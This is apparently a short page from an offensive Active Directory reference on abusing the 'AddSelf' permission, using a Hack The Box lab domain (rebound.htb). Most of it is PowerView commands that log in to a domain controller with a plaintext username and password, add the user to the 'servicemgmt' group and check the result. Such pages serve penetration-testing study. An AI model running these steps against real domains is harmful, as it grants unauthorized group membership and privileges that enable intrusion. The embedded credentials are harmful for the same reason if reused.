AddSelf

Information

The principal has the ability to add itself to the target group.

Exploitation

Add User to Group

This can be done natively (opsec considerations) or with PowerView.

# connect to the DC
powerview rebound.htb/oorend:'1GR8t@$$4u'@rebound.htb -k
# add user to the group
PV > Add-DomainGroupMember -Identity servicemgmt -Members oorend
# confirm group membership
PV > Get-DomainGroupMember -Identity servicemgmt

Resources

Last updated

Was this helpful?